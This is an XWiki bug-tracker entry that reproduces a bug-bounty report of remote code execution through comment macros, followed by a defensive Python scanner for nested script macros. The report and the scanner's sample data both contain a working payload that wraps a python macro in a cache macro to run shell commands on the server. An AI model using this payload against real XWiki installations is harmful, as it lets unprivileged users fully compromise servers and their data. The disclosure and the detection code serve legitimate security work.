Details
- Type: Bug
- Resolution: Solved By
- Priority: Blocker
- 4.2-milestone-1
- Unknown
Description
SUBMISSION REFERENCES
- Submission code: XWIKI-R66ON85E
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-R66ON85E
RESEARCHER INFORMATION
- Submitter: renniepak
SUBMISSION INFORMATION
- Created at: Wed, 16 Nov 2022 11:12:24 GMT
- Submission status: Archived
REPORT CONTENT
- Severity: Exceptional (9.9)
- Domain: https://intigriti.xwiki.com/ (Url)
- Proof of concept: Hi XWiki team,
I found another RCE in the comments that can be executed by any unprivileged user.
- Reproduction
1. Log in to XWiki and navigate to a random page. For example: https://intigriti.xwiki.com/xwiki/bin/view/Help/
2. Append `?viewer=comments` to the URL to view the comment section.
3. Click the `Comment` button and then the `Source` button.
4. Enter the following payload:
```
{{cache}}{{python}}import subprocess as A;print(A.check_output('id', shell=True)){{/python}}{{/cache}}
```
5. Click `add comment`
- Result
The resulting page will execute the code and print it to the screen.
- Impact: Any low privileged user can abuse this to run arbitrary code on the server. Doing so, they can completely compromise the application and server and its data.
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/commentadd/Help/WebHome?viewer=comments
- Type: Remote Code Execution
- Attachments: Screenshot 2022-11-16 121022.png
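As an added example (not part of the report above or of XWiki's own code): a small Python scanner for exported comment bodies that flags script macros, including ones wrapped inside another macro such as `{{cache}}`, which is the nesting the report uses to get past the restricted comment context. It generalizes the single payload to any nested script macro. The set of script macro names and the sample comment bodies are assumptions constructed for this example; the regex implements the XWiki 2.x `{{name}}...{{/name}}` macro syntax and does not handle parameter values that contain `}`.

```python
"""Scan XWiki comment bodies for script macros, including ones nested inside
wrapper macros such as {{cache}} (the bypass pattern used in this report)."""
import re
from dataclasses import dataclass

# Assumption: these are the XWiki script macro names worth flagging in
# untrusted content. Extend the set if your wiki installs extra script macros.
SCRIPT_MACROS = frozenset({"velocity", "groovy", "python", "script"})

# XWiki 2.x macro syntax: {{name p="v"}} ... {{/name}}  or  {{name p="v"/}}.
# Simplification: parameter values containing '}' are not handled.
MACRO_RE = re.compile(r"\{\{(/?)([A-Za-z][\w-]*)([^}]*?)(/?)\}\}")


@dataclass(frozen=True)
class Finding:
    macro: str          # script macro name that was found
    enclosing: tuple    # macros it is nested in, outermost first
    offset: int         # position of the opening tag in the comment body

    @property
    def wrapped(self) -> bool:
        # A script macro inside another macro's content is the pattern that
        # defeated the restricted comment context in this report.
        return bool(self.enclosing)


def scan_comment(body: str) -> list:
    """Return a Finding for every script macro opening tag in `body`."""
    stack = []       # names of currently open macros
    findings = []
    for m in MACRO_RE.finditer(body):
        closing, name, _params, self_closing = m.groups()
        name = name.lower()
        if closing:
            # Pop back to the matching opener; ignore stray closing tags.
            if name in stack:
                while stack.pop() != name:
                    pass
            continue
        if name in SCRIPT_MACROS:
            findings.append(Finding(name, tuple(stack), m.start()))
        if not self_closing:
            stack.append(name)
    return findings


def scan_comments(comments: dict) -> dict:
    """Map comment id -> findings, keeping only comments that have any."""
    return {cid: f for cid, body in comments.items() if (f := scan_comment(body))}


# Constructed sample comment bodies (not real data). The first is the payload
# from the report above with the macro braces intact.
SAMPLE_COMMENTS = {
    "c1": "{{cache}}{{python}}import subprocess as A;print(A.check_output('id', shell=True)){{/python}}{{/cache}}",
    "c2": "{{info}}Thanks, this page helped me.{{/info}}",
    "c3": '{{code language="python"}}print(1){{/code}}',  # code macro, not a script macro
    "c4": "{{groovy}}println 1{{/groovy}}",                # direct use; still worth logging
}

if __name__ == "__main__":
    for cid, findings in scan_comments(SAMPLE_COMMENTS).items():
        for f in findings:
            kind = "NESTED (bypass candidate)" if f.wrapped else "direct"
            print(f"{cid}: {{{{{f.macro}}}}} at offset {f.offset}, {kind}, enclosing={list(f.enclosing)}")
```

Run it over the `comment` property of the wiki's `XWiki.XWikiComments` objects (or any other user-supplied wiki content rendered in restricted mode); a wrapped finding is the one to look at first, since a bare script macro is already refused in a restricted context. This is a hunting aid for existing content, not a fix: the fix is the one tracked under XRENDERING-689.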
Issue Links
- duplicates: XRENDERING-689 Default macro content parser doesn't preserve restricted contexts (Closed)